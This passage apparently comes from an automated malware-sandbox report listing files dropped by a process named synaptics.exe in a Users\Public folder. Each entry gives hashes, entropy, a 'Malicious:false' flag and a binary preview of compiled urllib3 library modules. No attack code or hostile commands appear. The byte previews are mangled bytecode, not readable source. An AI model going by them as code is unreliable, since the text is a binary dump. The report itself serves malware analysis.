                                                                                                                                                                                      Entropy (8bit):5.490889587300124
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:384:+rlCIl5+QQvw7bm2+Pp0hTZp4tGwi5k43Y:OvgQQvwng+NZp8Of3Y
                                                                                                                                                                                      MD5:83499E28BC4CFD4B3D5210319D28C29D
                                                                                                                                                                                      SHA1:C4B71BC76441EFC96AB857F4E1B87BB1FD6EA807
                                                                                                                                                                                      SHA-256:A04D1FC6A90A6ADD48C70DA96C593D2A577DE1B530AF1F473299A1E5231B0F05
                                                                                                                                                                                      SHA-512:88330FE80D72A9E0424FF156F68653BA744ED5A360D6F2FACC7329FE1F3A0615EA3B51D3BDE10824661DE3D2BDA79A37F1AA68E33A2C25920BC86B90E37044DF
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o.......=..f.Y.......................@...s....d.d.l.m.Z...d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l m!Z!..d.d.l"m#Z#..d.d.l$m%Z%m&Z&..e.j'r.d.d.l(Z(d.d.l)m*Z*..g.d...Z+e..,e-..Z.d.Z/d.Z0G.d.d...d.e.j1..Z2d)d.d...Z3e..4e3e2..e..4e3e2..d...Z5e.e.d...Z6G.d.d ..d e...Z7G.d!d"..d"e7..Z8d*d'd(..Z9d.S.)+.....)...annotationsN)...TracebackType)...urljoin.....)...HTTPHeaderDict..RecentlyUsedContainer)...RequestMethods)...ProxyConfig)...HTTPConnectionPool..HTTPSConnectionPool..port_by_scheme)...LocationValueError..MaxRetryError..ProxySchemeUnknown..URLSchemeUnknown)...BaseHTTPResponse)..._TYPE_SOCKET_OPTIONS)...connection_requires_http_tunnel)...Retry)...Timeout)...Url..parse_url)...Self)...PoolManager..ProxyManager..proxy_from_url)...key_file..cert_file..cert_reqs..ca_certs..ca_cert_data..ssl_version..ssl_minimum_version..ssl_maximum_version..ca_cert_dir..ss
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):33452
                                                                                                                                                                                      Entropy (8bit):5.33455604589284
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:384:OcBkshRIwAG560Mg+c3lKBgtd1xaZ38CSYJr/YV4CypM0AmwK2Kd1B+E1dz6RPrX:+Gc8L1KBaPxbupCIAHK2KZiy8wUhX
                                                                                                                                                                                      MD5:0F61905A54FC16F50C6D0195DA1EBCE4
                                                                                                                                                                                      SHA1:A11EC9E16128D66F6EFE26749877EB50CD2C744A
                                                                                                                                                                                      SHA-256:5FD56509283133DF63DD7AE269A1E54B9D721552A4B687E941146A006524CD0A
                                                                                                                                                                                      SHA-512:FAD1E49841F441CD51202018B9B239155D3B9E5BD225F9C71FC78A29CA25775770CD8E2813B450AFC3B79858B10B0E1CF26D97A957978A25535E3AF4D1C97644
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o.......=..f.........................@...s....d.d.l.m.Z...d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...e.j.rKd.d.l.m.Z...z.z.d.d.l.Z.W.n...e.y_......d.d.l.Z.Y.n.w.W.n...e.yl......d.Z.Y.n.w.z.d.d.l.Z.W.n...e.e.e.f.y.......d.Z Y.n.w.e!e"e#e..$d.e.j%...&......Z'e'd.k.r.d.Z n.d.Z d.d.l(m)Z)..d.d.l.m*Z*..d.d.l+m,Z,..d.d.l-m.Z.m/Z/m0Z0..d.d.l1m2Z2m3Z3m4Z4m5Z5m6Z6m7Z7m8Z8m9Z9m:Z:m;Z;..d.d.l<m=Z=m>Z>..d.d.l?m@Z@..e.j.r.d.d.lAmBZB..e..CeD..ZEG.d.d...d...ZFG.d.d...d.eF..ZGG.d.d...d...ZHG.d.d...d.eF..ZIe.d.u...r.G.d.d...d.eF..ZJe ..r.G.d.d ..d eF..ZKG.d!d"..d"eF..ZLd.d&d'..ZMG.d(d)..d)..ZNG.d*d+..d+e.jO..ZPG.d,d-..d-eP..Z.d.S.)/.....)...annotationsN)...contextmanager)...HTTPMessage)...HTTPResponse)...timeout.....)...BaseHTTPConnectionFz.^([0-9]+)\.([0-9]+)).r.........T)...util)..._TYPE_BODY)...HTTPHeaderDict)...BaseSSLError..HTTPConnection..HTTPException)...BodyNotHttplibCompatible..DecodeError..HTTPError..IncompleteRead..
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):167
                                                                                                                                                                                      Entropy (8bit):4.589436179731363
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:3:y/C8llGllluleh/wZWevouWAuaHF50YTlHX0M9VWrzOXH+IOkcTgp:y/C8lcl/qeh/wjo+uaHxEM9Ar6XeR4
                                                                                                                                                                                      MD5:90F1B09BA05E86AEBE9D63BC0AFAB6FB
                                                                                                                                                                                      SHA1:94C96FF5AC94893757E25944E7BB9BA9389827E9
                                                                                                                                                                                      SHA-256:FE1F38A3B984211662EA49979A2AC2E5AD23E4C0D7CD18EE282CE1DEE087D70D
                                                                                                                                                                                      SHA-512:7BAA211F4051C912CCAD0C9658D03739308EE9D5E62F8A06DCC6BFFC346168D0F5A597E0BD9E545FA6A736AF51E0A844F00DF13D489B02F52887F67A48E87320
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o.......=..f.........................@...s....d.S.).N..r....r....r.....JC:\Users\Public\QExvbmVOb25l\lib\site-packages\urllib3\contrib\__init__.py..<module>....s......
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):6128
                                                                                                                                                                                      Entropy (8bit):5.6368976617629984
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:96:7q8bFojUEqiHSz8XKWZMs7hTbWiTmC69iE245Zi81JQ3:W6VEqt3GbC9ipca3
                                                                                                                                                                                      MD5:4646FAC81063E984B3293DC09325C233
                                                                                                                                                                                      SHA1:2789125CE874D5A1B985641F3E3B7706AE70928D
                                                                                                                                                                                      SHA-256:8FE7CB3D7C99E0B1AB573633646AEF632C5FA603A1F5A7DBB4496D6909AA7F2A
                                                                                                                                                                                      SHA-512:53C10552C15C3BBB33235016E1CD5DBE10E43B710754F99C693112685E4B7811F793CCF094A0680B98090635853BAD5B2E98EB84FB5890547CC65AC95723D78C
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o.......=..f}........................@...s6...d.Z.d.d.l.m.Z...z.d.d.l.Z.W.n...e.y&......d.d.l.Z.d.d.l.m.Z...e...d.e.......w.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...z.d.d.l.Z.W.n...e.yf......d.Z.Y.n.w.G.d.d...d.e.j...Z.G.d.d...d.e...Z.G.d.d...d.e.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z d.S.).a.....This module contains provisional support for SOCKS proxies from within.urllib3. This module supports SOCKS4, SOCKS4A (an extension of SOCKS4), and.SOCKS5. To enable its functionality, either install PySocks or install this.module with the ``socks`` extra...The SOCKS implementation supports the full range of urllib3 features. It also.supports the following SOCKS features:..- SOCKS4A (``proxy_url='socks4a://...``).- SOCKS4 (``proxy_url='socks4://...``).- SOCKS5 with remote DNS (``proxy_url='socks5h://...``).- SOCKS5 with local DNS (``proxy_url='socks5://...``).- Usernames and passwords for the SOCKS proxy.... note::. It is recom
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):1404
                                                                                                                                                                                      Entropy (8bit):5.389733870241377
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:24:LMu6QKYYYH7N9QU4DMU3KZsGfM3yRiR7FXpHW92vbwFWHrb49msQWP7:ABdYLbX4DinRaXRD9Hrb4mAP7
                                                                                                                                                                                      MD5:1590C80DBE3C9FE424FADF48BC409946
                                                                                                                                                                                      SHA1:97E3E3E9B23D6B5EF05FF0941B19F8A3D8DE50E4
                                                                                                                                                                                      SHA-256:FB17FA6AC53BB4BC33C9B03B3F0650DBA4441C1CE3C42DBDDA31A5E61FB47DB7
                                                                                                                                                                                      SHA-512:55CA40A78BCED9B8AC10B8AE092FA3A09E321349A0FA87AE7BFFA9E47986F0C29801FA6A5067CDF717F6EF56232BE6150265E43166F5BECFBB1B3C75C2CC51F3
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o.......=..f.........................@...sN...U.d.d.l.m.Z...d.d.l.m.Z...d.d.g.Z.d.d.l.Z.d.a.d.e.d.<.d.d.d...Z.d.d.d...Z.d.S.)......)...annotations)...version..inject_into_urllib3..extract_from_urllib3Nz.typing.Any..orig_HTTPSConnection..return..Nonec....................C...s....t.d...}.|...d...s.t.d.|...d.......d.d.l.m.}...d.d.l.m.}...d.d.l.m.}...d.d.l.m.}...d.d.l.m.}...|.j.a.|.|._.|.|._.d.g.|._.d.g.|._.d.S.).N..h2z.4.zQurllib3 v2 supports h2 version 4.x.x, currently the 'h2' module is compiled with z5. See: https://github.com/urllib3/urllib3/issues/3290.........connection....util....HTTPSConnectionPool....ssl_.....)...HTTP2Connection).r......startswith..ImportError..r....r......connectionpoolr....r....r......HTTPSConnectionr......ConnectionCls..ALPN_PROTOCOLS).Z.h2_version..urllib3_connection..urllib3_utilr......urllib3_util_sslr......r.....HC:\Users\Public\QExvbmVOb25l\lib\site-packages\urllib3\http2\__init__.pyr........s".....................................c....................C...
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):2538
                                                                                                                                                                                      Entropy (8bit):5.259623122633178
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:48:kPQG3rPiqRTB08DGmDZrZCYawGQ2bcwf27jpWsI663cv6iuJh6+:kzZ/DGmDZEYaw4bbujpXkSNok+
                                                                                                                                                                                      MD5:D2254B6CEBDA8DF150D456B4742724C6
                                                                                                                                                                                      SHA1:00093CC93F7087A44FDC68C6DBC23C742D1132CA
                                                                                                                                                                                      SHA-256:FF7532641CF5FF3491AADCC77C3E11F2662411B9210EBE209CF54218A1A9A013
                                                                                                                                                                                      SHA-512:4B9E4858A0033E3BF331E18E496AFA7C03EB64E207F954555A8471541FC1F470A7A993C7BF64729F436710FE1DFB3AEE4E0F0A30B852D507CACA74FEE5448004
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o.......=..f.........................@...sL...d.d.l.m.Z...d.d.l.Z.G.d.d...d...Z.e...Z.e.j.Z.e.j.Z.e.j.Z.e.j.Z.d.d.g.Z.d.S.)......)...annotationsNc....................@...sB...e.Z.d.Z.d.Z.d.d.d...Z.d.d.d...Z.d.d.d...Z.d.d.d...Z.d.d.d...Z.d.S.)..._HTTP2ProbeCache...._lock.._cache_locks.._cache_values..return..Nonec....................C...s....t.....|._.i.|._.i.|._.d.S...N)...threading..Lockr....r....r........self..r.....EC:\Users\Public\QExvbmVOb25l\lib\site-packages\urllib3\http2\probe.py..__init__....s..........z._HTTP2ProbeCache.__init__..host..str..port..int..bool | Nonec....................C...s....d.}.|.j..7..|.|.f.}.z.|.j.|...}.|.d.u.r.|.W.W...d.........S.W.n...t.y4......t.....|.j.|.<.d.|.j.|.<.Y.n.w.W.d.........n.1.s?w.......Y...|.j.|...}.|.......z.|.j.|...}.W.|.S...t.ym..}...z.t.|.t...rdJ...|.........d.}.~.w.w.r....).r....r......KeyErrorr......RLockr......acquire..BaseException..isinstance..release).r....r....r......value..key..key_lock..er....r....r......acquire_and_get....s4..
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):947
                                                                                                                                                                                      Entropy (8bit):5.338528519953842
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:24:cIJUVegJzYoyYhRYQZyihmLptrv2buqq9PXVHL:H3gJz2Y39Zyi0TrOaqq9PN
                                                                                                                                                                                      MD5:424358AB51D1BC6E18F57E16A2F1771A
                                                                                                                                                                                      SHA1:58CC71A09FC9FDE3FE0A25D5066D6657DCB08F33
                                                                                                                                                                                      SHA-256:62AB69EEC845AB6A84A1D61805025FB0482B0D9E99D6CE07240DBD4725013025
                                                                                                                                                                                      SHA-512:B6DAA22E27C43B2D3BC49F16B22A817FD19F0B6F3D4EEE99A99D8ADB65FD40491100C08A5BB6BAFBBC248EBA89B4F58B983B06C103E0AD36FFF62CE19072A343
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o.......=..f.........................@...s....d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z.m.Z...d.Z.d.S.)......)...annotations.....)...is_connection_dropped)...SKIP_HEADER..SKIPPABLE_HEADERS..make_headers)...is_fp_closed)...Retry)...ALPN_PROTOCOLS..IS_PYOPENSSL..SSLContext..assert_fingerprint..create_urllib3_context..resolve_cert_reqs..resolve_ssl_version..ssl_wrap_socket)...Timeout)...Url..parse_url)...wait_for_read..wait_for_write).r....r....r....r....r....r....r....r....r....r....r....r....r....r....r....r....r....r....r....N)...__future__r......connectionr......requestr....r....r......responser......retryr....Z.ssl_r....r....r....r....r....r....r....r......timeoutr......urlr....r......waitr....r......__all__..r ...r ....GC:\Users\Public\QExvbmVOb25l\lib\site-packages\urllib3\util\__init__.py..<module>....s..............(.........
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):3466
                                                                                                                                                                                      Entropy (8bit):5.548630731870598
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:48:5d8QkXnGs+RA+j7JArpwwSRGR7UAm0DEWStUV5yrIeoYPqr+rb8WTUVHwZJP9+:nkX3+m+hAVwwStdndm5YXiub8WT3ZJI
                                                                                                                                                                                      MD5:B4695B158EC6266D4D8390E989B805FC
                                                                                                                                                                                      SHA1:142F5D17F6742CCDFAE79B719509BF3D500BF061
                                                                                                                                                                                      SHA-256:3F154DDBF869119C1608BF4FFCF3CAE264985FF52257809F5912738D474531A5
                                                                                                                                                                                      SHA-512:B231A5E81286F246F49447AB40E507D2001899D3A8BC22C3365ACB2C631E0B4F9F0A092909C7F3D52A168067296763148515738643A8E15E6D75AE56C398C1B4
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o.......=..fj........................@...s....d.d.l.m.Z...d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z...e.j.e.j.e.e.e.j.e.e.f...f.....Z.e.j.r5d.d.l.m.Z...d&d.d...Z.e.d.d.f.d'd.d...Z.d(d.d...Z.d)d.d ..Z.d*d#d$..Z.e.d%..Z.d.S.)+.....)...annotationsN.....)...LocationParseError.....)..._DEFAULT_TIMEOUT.._TYPE_TIMEOUT)...BaseHTTPConnection..connr......return..boolc....................C...s....|.j...S.).z.. Returns True if the connection is dropped and should be closed.. :param conn: :class:`urllib3.connection.HTTPConnection` object.. )...is_connected).r......r.....IC:\Users\Public\QExvbmVOb25l\lib\site-packages\urllib3\util\connection.py..is_connection_dropped....s......r......address..tuple[str, int]..timeoutr......source_address..tuple[str, int] | None..socket_options.._TYPE_SOCKET_OPTIONS | None..socket.socketc....................C...s$...|.\.}.}.|...d...r.|...d...}.d.}.t...}.z.|...d.....W.n...t.y*......t.d.|...d.....d...w.t...|.|.|.t.j...D.]O}.|.\.}.}.}.}.}.d.}.z(t...|.|.|...}.t.
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):1077
                                                                                                                                                                                      Entropy (8bit):5.403816031998314
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:24:V/ZpGf5n/lIpWt84RzmQXvAFnT8adLRbpH7frY8lt6rn:Vut/Rt82m38apbf7S
                                                                                                                                                                                      MD5:89B8E3BD7EA958F102981CF9700291E5
                                                                                                                                                                                      SHA1:B919C52800EA48EC1E2D6059E8688DF8F82B6A25
                                                                                                                                                                                      SHA-256:BD8D7612D207CC4D48B9705DBE325CA4EF8780DB313F90400BD4EEB951D6CF1C
                                                                                                                                                                                      SHA-512:F3D5D29E9F2BB1D9EF378F525B90B65CEF40B81E000A70DE839F952F49E9F639C0D66DCA277C259BECB56A2CEE2583DD7B267F2E846BD06F61AF81A386CFD830
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o.......=..f|........................@...sH...d.d.l.m.Z...d.d.l.Z.d.d.l.m.Z...e.j.r.d.d.l.m.Z.........d.d.d.d...Z.d.S.)......)...annotationsN.....)...Url.....)...ProxyConfig..proxy_url..Url | None..proxy_config..ProxyConfig | None..destination_scheme..str | None..return..boolc....................C...s4...|.d.u.r.d.S.|.d.k.r.d.S.|.j.d.k.r.|.r.|.j.r.d.S.d.S.).a?.... Returns True if the connection requires an HTTP CONNECT through the proxy... :param URL proxy_url:. URL of the proxy.. :param ProxyConfig proxy_config:. Proxy configuration from poolmanager.py. :param str destination_scheme:. The scheme of the destination. (i.e https, http, etc). NF..http..httpsT)...scheme..use_forwarding_for_https).r....r....r......r.....DC:\Users\Public\QExvbmVOb25l\lib\site-packages\urllib3\util\proxy.py..connection_requires_http_tunnel....s..........................r....).NNN).r....r....r....r....r....r....r....r....)...__future__r......typing..urlr......TYPE_CHECKING..
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):6201
                                                                                                                                                                                      Entropy (8bit):5.645657954132128
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:96:Rj+t5DiDKV+DKYzQ2P7fRxa5jyGyT/aOMyjxMbsrHMCtkwTVvAJhK:EyKV+DKYzP7pxdCsxM4H/T5
                                                                                                                                                                                      MD5:768DA1FD967B1B2A551B8DFB642A91BD
                                                                                                                                                                                      SHA1:FA5C08C88A1670F319EC0BC3A6708E9B96806DC5
                                                                                                                                                                                      SHA-256:B9E80DCD48BC622E27463FA64FD801320077FDAFA6D0ECE221CD6542176E06F9
                                                                                                                                                                                      SHA-512:D5EAB6C071D39127DDB4F60AE3932E0199FCC8FAB1DEC8EEAC0F5D17A4314AB5D0E1D52A6596DFC221038FF054DB91B5300F95BE786DEBBC1C9A36E68BAB5936
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o.......=..f.........................@...sd...U.d.d.l.m.Z...d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...e.j.r0d.d.l.m.Z...d.Z.e.g.d.....Z.d.Z.z.z.d.d.l.Z.W.n...e.yN......d.d.l.Z.Y.n.w.W.n...e.yY......Y.n.w.e.d.7.Z.z.d.d.l.Z.W.n...e.ym......Y.n.w.e.d.7.Z.G.d.d...d.e...Z.e.j.Z.d.e.d.<.e.j.e.e.f...Z.h.d...Z.............d6d7d.d ..Z d8d%d&..Z!d9d+d,..Z"G.d-d...d.e.j#..Z$d:d4d5..Z%d.S.);.....)...annotationsN)...b64encode)...Enum.....)...UnrewindableBodyError.....)...to_bytes)...Finalz.@@@SKIP_HEADER@@@)...accept-encoding..host..user-agentz.gzip,deflatez.,brz.,zstdc....................@...s....e.Z.d.Z.d.Z.d.S.)..._TYPE_FAILEDTELLr....N)...__name__..__module__..__qualname__..token..r....r.....FC:\Users\Public\QExvbmVOb25l\lib\site-packages\urllib3\util\request.pyr....'...s........r....z.Final[_TYPE_FAILEDTELL].._FAILEDTELL>....Z.CONNECTZ.DELETE..HEADZ.TRACEZ.OPTIONS..GET..keep_alive..bool | None..accept_encoding..bool | list[str] | str | None..user_agent..str | None..basic_
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):2333
                                                                                                                                                                                      Entropy (8bit):5.382572800996394
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:48:Cmhh16zJQ+Nk7gkL2YMHhfpm7kmpx6nriZEviRo3C:p6zGslvhaIds
                                                                                                                                                                                      MD5:4F5A13A1D17878BAD785726FAB32B4CB
                                                                                                                                                                                      SHA1:513C6B187C8B4144D3CFF386752037A61AE07394
                                                                                                                                                                                      SHA-256:CFF30FA5DA11ACD82F0F6CE182CEB700DEC0631D40E10860E17D2853AEE83D81
                                                                                                                                                                                      SHA-512:780F372F388BC2BE3CB84B4FB8E48C6CF6B3D322AEB3958F7AB616786C8DA3ABA417614AF14E1311DFD5F41F6E8935DBB23E8F63B91314A340BF921EB184B9A2
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o.......=..f.........................@...sV...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.d...Z.d.d.d...Z.d.d.d...Z.d.S.)......)...annotationsN)..!MultipartInvariantViolationDefect..StartBoundaryNotFoundDefect.....)...HeaderParsingError..obj..object..return..boolc....................C...s`...z.|.....W.S...t.y.......Y.n.w.z.|.j.W.S...t.y.......Y.n.w.z.|.j.d.u.W.S...t.y/......Y.t.d.....w.).zt. Checks whether a given file-like object is closed... :param obj:. The file-like object to check.. Nz)Unable to determine whether fp is closed.)...isclosed..AttributeError..closed..fp..ValueError).r......r.....GC:\Users\Public\QExvbmVOb25l\lib\site-packages\urllib3\util\response.py..is_fp_closed....s ...................................r......headers..httplib.HTTPMessage..Nonec....................C...sn...t.|.t.j...s.t.d.t.|.....d.......d.}.|.....s#|.....}.t.|.t.t.f...r#|.}.d.d...|.j.D...}.|.s/|.r5t.|.|.d.....d.S.).a>.... Asserts whether all headers have been successful
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):15746
                                                                                                                                                                                      Entropy (8bit):5.362946859038454
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:192:0f/Qj12FuuccXjtRLJIkyuhvCF4+W8THjSbG9JJb2s5297Y:09suPVJvCOWDsG97297Y
                                                                                                                                                                                      MD5:2992303387474E39D65AC07FF91F0C3F
                                                                                                                                                                                      SHA1:D33EB39E206EBA6ECD50AA829544907EE5D34704
                                                                                                                                                                                      SHA-256:A1DA0AB0D791099B196DAEB816A7B2D738C476E8D46EE03A0F30A56B2875BBC1
                                                                                                                                                                                      SHA-512:615215A3C502F35C39C909CF775AC6A6BD26015B49B23E6D0D52E826CC0E60B4768CB8EF703BD32E45C350337919CE00C2B1F25E4E1DEA899548BFD55345A4CF
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o.......=..f.H.......................@...s....d.d.l.m.Z...d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...e.j.rWd.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...e...e...Z.G.d.d...d.e.j ..Z!G.d.d...d...Z"e"d...e"_#d.S.)......)...annotationsN)...takewhile)...TracebackType.....)...ConnectTimeoutError..InvalidHeader..MaxRetryError..ProtocolError..ProxyError..ReadTimeoutError..ResponseError.....)...reraise)...Self)...ConnectionPool)...BaseHTTPResponsec....................@...s6...e.Z.d.Z.U.d.e.d.<.d.e.d.<.d.e.d.<.d.e.d.<.d.e.d.<.d.S.)...RequestHistory..str | None..method..url..Exception | None..error..int | None..status..redirect_locationN)...__name__..__module__..__qualname__..__annotations__..r....r.....DC:\Users\Public\QExvbmVOb25l\lib\site-packages\urllib3\util\retry.pyr....!...s................r....c....................@...s"...e.Z.d.Z.U.d.Z.e.g.d.....Z.e.g.d.....Z.e.g.d.....Z.d.Z.d.e.d.<.d.d.d.d.d.d.e.d.d.e.d.d.d.d.e.d.f.dbd'd
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):12458
                                                                                                                                                                                      Entropy (8bit):5.650762055607489
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:384:pjDb/AE642qEOM00ueLG0d1JK9CZdFyKZA2MlJC9M7:BBpEfBbLPfyKZmbC+7
                                                                                                                                                                                      MD5:F81440DDB369A5B5F6CCA2294FAAE447
                                                                                                                                                                                      SHA1:1A90D65315AB6672854EDB3B8EE992F64AD0B91B
                                                                                                                                                                                      SHA-256:5CD4D75F9A944720A33264EBBBCB02B0927B68D07449F9D520692613A1A0FB73
                                                                                                                                                                                      SHA-512:521D91E50F78A6300467D2165CA99BBA2EBA393F8ABFED552BADE2AA9202D57B2986A24612FF95DBA2BFCA466E63CABD60A271125D8D19688C9E18726A73AD7D
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o.......=..f&K.......................@...s....U.d.d.l.m.Z...d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z.m.Z...d.Z.d.Z.d.Z.d.Z.d.g.Z.e.j.e.e.e.e.e.f...Z.d.d...d.D...Z.dcd.d...Z.ddd.d...Z.e.j.r~d.d.l.m.Z...d.d.l.m Z ..d.d.l!m.Z"..G.d.d ..d e d.d!..Z#i.Z$d"e%d#<.z_d.d.l.Z.d.d$l.m&Z&m.Z.m'Z'm(Z(m)Z)m*Z*m+Z+m,Z,m-Z-m.Z.m.Z.m/Z/..e+Z0e.r.e.e)e*e.j1j2e.j3e.j1j2d%k.r.e.j4n.d...s.d.Z.d&D.].Z5z.e6e/e5..e$e6e.d'e5......<.W.q...e7y.......Y.q.w.d.d.l!m.Z...W.n...e8y.......d(Z'd)Z(d*Z-d+Z.d...Z0Z+d,Z,Y.n.w.e.j9d e:d.f...Z;ded1d2..Z<dfd6d7..Z=dgd8d9..Z>............dhdidCdD..Z?e.j@.E.E.E.E.E.E.E.E.E.E.E.EdjdkdUdV....ZAe.j@.E.E.E.E.E.E.E.E.E.E.E.EdjdldXdV....ZA........................dmdldYdV..ZAdnd\d]..ZBdod_d`..ZC..dpdqdadb..ZDd.S.)r.....)...annotationsN)...unhexlify.....)...ProxySchemeUnsupported..SSLError.....)..._BRACELESS_IPV6_ADDRZ_RE.._IPV4_REFz.http/1.1c....................C...s....i.|.].\.}.}.|.t.t.|.d.....q.S...N)...getattr..hashlib)....0..le
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):3702
                                                                                                                                                                                      Entropy (8bit):5.71592384052882
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:96:hY/R/mUkAMdqu1vkAlH2TIYxfyRGH0MYUFgAL8IzE+wqq3:hXPA2MAV07xjHTgh2Etqq3
                                                                                                                                                                                      MD5:9D6D184381D65DD413843F71E9B59F78
                                                                                                                                                                                      SHA1:D02983E5BCA7BCA7877F26913C284DD6B09C2B07
                                                                                                                                                                                      SHA-256:9B8070B2987FD29A77A68267A62FB61BB146AA260F30F07554CC8BB182BBDFC3
                                                                                                                                                                                      SHA-512:04DE584F171B5FB89E35DF22AE5B8447CAAA194FEF2301AAAD679CB3701CF665E3B4FE1A22FF42B3FF3CAA033E6AEE86457B52CF03E10E09E503F8A21FB0F3CA
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
